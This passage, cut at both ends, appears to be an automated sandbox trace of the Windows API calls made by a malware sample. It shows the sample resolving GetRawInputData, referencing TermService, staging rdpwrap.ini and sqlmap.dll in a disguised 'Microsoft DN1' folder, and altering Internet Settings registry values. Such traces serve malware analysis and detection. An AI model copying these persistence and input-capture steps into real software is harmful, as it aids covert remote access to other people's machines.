lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DdeSetQualityOfService", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DdeSetUserHandle", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DdeUnaccessData", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DdeUninitialize", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DefDlgProcA", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DefDlgProcW", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DefFrameProcA", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DefFrameProcW", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DefMDIChildProcA", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DefMDIChildProcW", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DefRawInputProc", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DefWindowProcA", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DefWindowProcW", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DeferWindowPos", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DeleteMenu", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DeregisterShellHookWindow", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DestroyAcceleratorTable", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DestroyCaret", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DestroyCursor", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DestroyIcon", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DestroyMenu", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DestroyReasons", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DestroyWindow", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DeviceEventWorker", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DialogBoxIndirectParamA", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DialogBoxIndirectParamAorW", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DialogBoxIndirectParamW", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DialogBoxParamA", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DialogBoxParamW", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DisableProcessWindowsGhosting", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DispatchMessageA", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DispatchMessageW", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DisplayConfigGetDeviceInfo", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DisplayConfigSetDeviceInfo", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DisplayExitWindowsWarnings", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DlgDirListA", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DlgDirListComboBoxA", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DlgDirListComboBoxW", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DlgDirListW", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DlgDirSelectComboBoxExA", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DlgDirSelectComboBoxExW", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DlgDirSelectExA", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DlgDirSelectExW", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DoSoundConnect", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DoSoundDisconnect", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DragDetect", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DragObject", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DrawAnimatedRects", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DrawCaption", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DrawCaptionTempA", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DrawCaptionTempW", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DrawEdge", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DrawFocusRect", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DrawFrame", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DrawFrameControl", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DrawIcon", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DrawIconEx", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DrawMenuBar", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DrawMenuBarTemp", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DrawStateA", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DrawStateW", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DrawTextA", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DrawTextExA", lpString2="GetRawInputData") returned -1 [0073.481] lstrcmpA (lpString1="DrawTextExW", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="DrawTextW", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="DwmGetDxSharedSurface", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="DwmStartRedirection", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="DwmStopRedirection", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EditWndProc", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EmptyClipboard", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnableMenuItem", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnableScrollBar", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnableWindow", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EndDeferWindowPos", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EndDialog", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EndMenu", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EndPaint", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EndTask", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnterReaderModeHelper", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnumChildWindows", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnumClipboardFormats", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnumDesktopWindows", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnumDesktopsA", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnumDesktopsW", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnumDisplayDevicesA", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnumDisplayDevicesW", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnumDisplayMonitors", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnumDisplaySettingsA", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnumDisplaySettingsExA", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnumDisplaySettingsExW", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnumDisplaySettingsW", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnumPropsA", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnumPropsExA", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnumPropsExW", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnumPropsW", lpString2="GetRawInputData") returned -1 [0073.482] lstrcmpA (lpString1="EnumThreadWindows", lpString2="GetRawInputData") returned -1 [0073.483] lstrcmpA (lpString1="EnumWindowStationsA", lpString2="GetRawInputData") returned -1 [0073.483] lstrcmpA (lpString1="EnumWindowStationsW", lpString2="GetRawInputData") returned -1 [0073.483] lstrcmpA (lpString1="EnumWindows", lpString2="GetRawInputData") returned -1 [0073.483] lstrcmpA (lpString1="EqualRect", lpString2="GetRawInputData") returned -1 [0073.483] lstrcmpA (lpString1="ExcludeUpdateRgn", lpString2="GetRawInputData") returned -1 [0073.483] lstrcmpA (lpString1="ExitWindowsEx", lpString2="GetRawInputData") returned -1 [0073.483] lstrcmpA (lpString1="FillRect", lpString2="GetRawInputData") returned -1 [0073.483] lstrcmpA (lpString1="FindWindowA", lpString2="GetRawInputData") returned -1 [0073.483] lstrcmpA (lpString1="FindWindowExA", lpString2="GetRawInputData") returned -1 [0073.484] lstrlenW (lpString="TermService") returned 11 [0073.484] lstrcpyW (in: lpString1=0x1c0000, lpString2="TermService" | out: lpString1="TermService") returned="TermService" [0073.484] lstrlenW (lpString="TermService") returned 11 [0073.484] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x1d0000 [0073.484] lstrcatW (in: lpString1="", lpString2="TermService" | out: lpString1="TermService") returned="TermService" [0073.484] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.484] lstrlenW (lpString="%ProgramFiles%") returned 14 [0073.484] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x1c0000 [0073.485] lstrlenW (lpString="%ProgramFiles%") returned 14 [0073.485] lstrcpyW (in: lpString1=0x1c0000, lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0073.485] lstrlenW (lpString="%ProgramFiles%") returned 14 [0073.485] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1e0000 [0073.485] lstrcatW (in: lpString1="", lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0073.485] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.485] GetCurrentProcess () returned 0xffffffff [0073.485] GetModuleHandleA (lpModuleName="kernel32") returned 0x76d30000 [0073.485] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0073.486] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x31f9f4 | out: Wow64Process=0x31f9f4) returned 1 [0073.486] VirtualFree (lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.486] lstrlenW (lpString="%ProgramW6432%") returned 14 [0073.486] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x1c0000 [0073.486] lstrlenW (lpString="%ProgramW6432%") returned 14 [0073.486] lstrcpyW (in: lpString1=0x1c0000, lpString2="%ProgramW6432%" | out: lpString1="%ProgramW6432%") returned="%ProgramW6432%" [0073.486] lstrlenW (lpString="%ProgramW6432%") returned 14 [0073.486] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1e0000 [0073.486] lstrcatW (in: lpString1="", lpString2="%ProgramW6432%" | out: lpString1="%ProgramW6432%") returned="%ProgramW6432%" [0073.486] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.486] ExpandEnvironmentStringsW (in: lpSrc="%ProgramW6432%", lpDst=0x31f604, nSize=0x1ff | out: lpDst="C:\\Program Files") returned 0x11 [0073.487] lstrlenW (lpString="C:\\Program Files") returned 16 [0073.487] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x1c0000 [0073.487] lstrlenW (lpString="C:\\Program Files") returned 16 [0073.487] lstrcpyW (in: lpString1=0x1c0000, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0073.487] lstrlenW (lpString="C:\\Program Files") returned 16 [0073.487] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x1f0000 [0073.487] lstrcpyW (in: lpString1=0x1f0000, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0073.487] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.487] VirtualFree (lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.487] lstrlenW (lpString="%ProgramFiles%") returned 14 [0073.487] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x1c0000 [0073.488] lstrlenW (lpString="%ProgramFiles%") returned 14 [0073.488] lstrcpyW (in: lpString1=0x1c0000, lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0073.488] lstrlenW (lpString="%ProgramFiles%") returned 14 [0073.488] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1e0000 [0073.488] lstrcatW (in: lpString1="", lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0073.488] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.488] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0073.488] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x1c0000 [0073.488] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0073.489] lstrcpyW (in: lpString1=0x1c0000, lpString2="\\Microsoft DN1" | out: lpString1="\\Microsoft DN1") returned="\\Microsoft DN1" [0073.489] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0073.489] lstrlenW (lpString="C:\\Program Files") returned 16 [0073.489] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x31f9a8, dwLength=0x1c | out: lpBuffer=0x31f9a8*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0073.489] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x200000 [0073.489] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.489] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\Microsoft DN1" | out: lpString1="C:\\Program Files\\Microsoft DN1") returned="C:\\Program Files\\Microsoft DN1" [0073.489] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.490] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0073.490] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x1c0000 [0073.490] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0073.490] lstrcpyW (in: lpString1=0x1c0000, lpString2="\\Microsoft DN1" | out: lpString1="\\Microsoft DN1") returned="\\Microsoft DN1" [0073.490] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0073.490] lstrlenW (lpString="%ProgramFiles%") returned 14 [0073.490] VirtualQuery (in: lpAddress=0x1e0000, lpBuffer=0x31f9a8, dwLength=0x1c | out: lpBuffer=0x31f9a8*(BaseAddress=0x1e0000, AllocationBase=0x1e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0073.490] VirtualAlloc (lpAddress=0x0, dwSize=0x3c, flAllocationType=0x3000, flProtect=0x4) returned 0x1f0000 [0073.490] VirtualFree (lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.490] lstrcatW (in: lpString1="%ProgramFiles%", lpString2="\\Microsoft DN1" | out: lpString1="%ProgramFiles%\\Microsoft DN1") returned="%ProgramFiles%\\Microsoft DN1" [0073.490] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.491] SHCreateDirectoryExW (hwnd=0x0, pszPath="C:\\Program Files\\Microsoft DN1" (normalized: "c:\\program files\\microsoft dn1"), psa=0x0) returned 0 [0073.972] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0073.972] VirtualAlloc (lpAddress=0x0, dwSize=0x3e, flAllocationType=0x3000, flProtect=0x4) returned 0x210000 [0073.972] lstrcpyW (in: lpString1=0x210000, lpString2="C:\\Program Files\\Microsoft DN1" | out: lpString1="C:\\Program Files\\Microsoft DN1") returned="C:\\Program Files\\Microsoft DN1" [0073.973] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0073.973] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x700000 [0073.973] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0073.973] lstrcpyW (in: lpString1=0x700000, lpString2="\\rdpwrap.ini" | out: lpString1="\\rdpwrap.ini") returned="\\rdpwrap.ini" [0073.973] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0073.973] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0073.973] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x31f9a8, dwLength=0x1c | out: lpBuffer=0x31f9a8*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0073.973] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x710000 [0073.974] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.974] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft DN1", lpString2="\\rdpwrap.ini" | out: lpString1="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini") returned="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini" [0073.974] VirtualFree (lpAddress=0x700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.974] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0073.974] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x210000 [0073.975] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0073.975] lstrcpyW (in: lpString1=0x210000, lpString2="\\sqlmap.dll" | out: lpString1="\\sqlmap.dll") returned="\\sqlmap.dll" [0073.975] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0073.975] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0073.975] VirtualQuery (in: lpAddress=0x200000, lpBuffer=0x31f9a8, dwLength=0x1c | out: lpBuffer=0x31f9a8*(BaseAddress=0x200000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0073.975] VirtualAlloc (lpAddress=0x0, dwSize=0x56, flAllocationType=0x3000, flProtect=0x4) returned 0x700000 [0073.975] VirtualFree (lpAddress=0x200000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.975] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft DN1", lpString2="\\sqlmap.dll" | out: lpString1="C:\\Program Files\\Microsoft DN1\\sqlmap.dll") returned="C:\\Program Files\\Microsoft DN1\\sqlmap.dll" [0073.975] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.975] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0073.975] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x200000 [0073.976] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0073.976] lstrcpyW (in: lpString1=0x200000, lpString2="\\sqlmap.dll" | out: lpString1="\\sqlmap.dll") returned="\\sqlmap.dll" [0073.976] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0073.976] lstrlenW (lpString="%ProgramFiles%\\Microsoft DN1") returned 28 [0073.976] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x31f9a8, dwLength=0x1c | out: lpBuffer=0x31f9a8*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0073.976] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x210000 [0073.976] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.977] lstrcatW (in: lpString1="%ProgramFiles%\\Microsoft DN1", lpString2="\\sqlmap.dll" | out: lpString1="%ProgramFiles%\\Microsoft DN1\\sqlmap.dll") returned="%ProgramFiles%\\Microsoft DN1\\sqlmap.dll" [0073.977] VirtualFree (lpAddress=0x200000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.999] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x1f0000 [0073.999] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1b0 [0073.999] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x54cb9c | out: lpWSAData=0x54cb9c) returned 0 [0074.052] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x200000 [0074.052] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1c4 [0074.052] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x54cd7c | out: lpWSAData=0x54cd7c) returned 0 [0074.052] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1c8 [0074.053] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0074.053] GetTickCount () returned 0x114a9d7 [0074.053] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x31f4d0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v5vybig3hwd7d5jw.exe")) returned 0x3a [0074.053] GetProcessHeap () returned 0x960000 [0074.053] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x400000) returned 0x2b70020 [0074.054] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v5vybig3hwd7d5jw.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0074.054] GetFileSize (in: hFile=0x1cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb7400 [0074.054] ReadFile (in: hFile=0x1cc, lpBuffer=0x2b70020, nNumberOfBytesToRead=0xb7400, lpNumberOfBytesRead=0x31f3c4, lpOverlapped=0x0 | out: lpBuffer=0x2b70020*, lpNumberOfBytesRead=0x31f3c4*=0xb7400, lpOverlapped=0x0) returned 1 [0074.067] CloseHandle (hObject=0x1cc) returned 1 [0074.068] GetProcessHeap () returned 0x960000 [0074.068] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x20) returned 0x994418 [0074.068] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="\x07©\x97U") returned 0x1cc [0074.068] GetLastError () returned 0x0 [0074.068] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x31f3e0, lpdwDisposition=0x31f3f4 | out: phkResult=0x31f3e0*=0x1d0, lpdwDisposition=0x31f3f4*=0x2) returned 0x0 [0074.068] RegSetValueExA (in: hKey=0x1d0, lpValueName="MaxConnectionsPer1_0Server", Reserved=0x0, dwType=0x4, lpData=0x31f3ec*=0xa, cbData=0x4 | out: lpData=0x31f3ec*=0xa) returned 0x0 [0074.068] RegSetValueExA (in: hKey=0x1d0, lpValueName="MaxConnectionsPerServer", Reserved=0x0, dwType=0x4, lpData=0x31f3ec*=0xa, cbData=0x4 | out: lpData=0x31f3ec*=0xa) returned 0x0 [0074.069] RegCloseKey (hKey=0x1d0) returned 0x0 [0074.069] Sleep (dwMilliseconds=0x1f4) [0074.588] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1d0 [0074.588] GetProcessHeap () returned 0x960000 [0074.588] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0xf4) returned 0x98fa18 [0074.588] GetProcessHeap () returned 0x960000 [0074.588] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x400) returned 0x98fb18 [0074.588] GetProcessHeap () returned 0x960000 [0074.588] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x11c00) returned 0x99afb8 [0074.590] GetProcessHeap () returned 0x960000 [0074.590] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x11c00) returned 0x9acbc0 [0074.591] GetProcessHeap () returned 0x960000 [0074.591] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99afb8 | out: hHeap=0x960000) returned 1 [0074.591] GetProcessHeap () returned 0x960000 [0074.591] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x4a00) returned 0x99afb8 [0074.591] GetProcessHeap () returned 0x960000 [0074.591] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x4a00) returned 0x99f9c0 [0074.591] GetProcessHeap () returned 0x960000 [0074.591] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99afb8 | out: hHeap=0x960000) returned 1 [0074.592] GetProcessHeap () returned 0x960000 [0074.592] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x600) returned 0x9be7c8 [0074.592] GetProcessHeap () returned 0x960000 [0074.592] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x600) returned 0x98ff20 [0074.592] GetProcessHeap () returned 0x960000 [0074.592] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x9be7c8 | out: hHeap=0x960000) returned 1 [0074.592] GetProcessHeap () returned 0x960000 [0074.592] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x2e00) returned 0x990528 [0074.592] GetProcessHeap () returned 0x960000 [0074.592] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x2e00) returned 0x99afb8 [0074.593] GetProcessHeap () returned 0x960000 [0074.593] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x990528 | out: hHeap=0x960000) returned 1 [0074.593] GetProcessHeap () returned 0x960000 [0074.593] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x1000) returned 0x99ddc0 [0074.593] GetProcessHeap () returned 0x960000 [0074.593] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x1000) returned 0x990528 [0074.593] GetProcessHeap () returned 0x960000 [0074.593] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x99ddc0 | out: hHeap=0x960000) returned 1 [0074.593] GetProcessHeap () returned 0x960000 [0074.593] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x200) returned 0x9be7c8 [0074.593] GetProcessHeap () returned 0x960000 [0074.593] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x5a4) returned 0x9be9d0 [0074.593] GetProcessHeap () returned 0x960000 [0074.593] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x11c00) returned 0x9bef80 [0074.594] GetProcessHeap () returned 0x960000 [0074.594] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x4a00) returned 0x9a43c8 [0074.595] GetProcessHeap () returned 0x960000 [0074.595] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x600) returned 0x99ddc0 [0074.595] GetProcessHeap () returned 0x960000 [0074.595] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x2e00) returned 0x9a8dd0 [0074.595] GetProcessHeap () returned 0x960000 [0074.595] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x1000) returned 0x99e3c8 [0074.595] GetProcessHeap () returned 0x960000 [0074.595] HeapFree (in: hHeap=0x960000, dwFlags=0x0, lpMem=0x990528 | 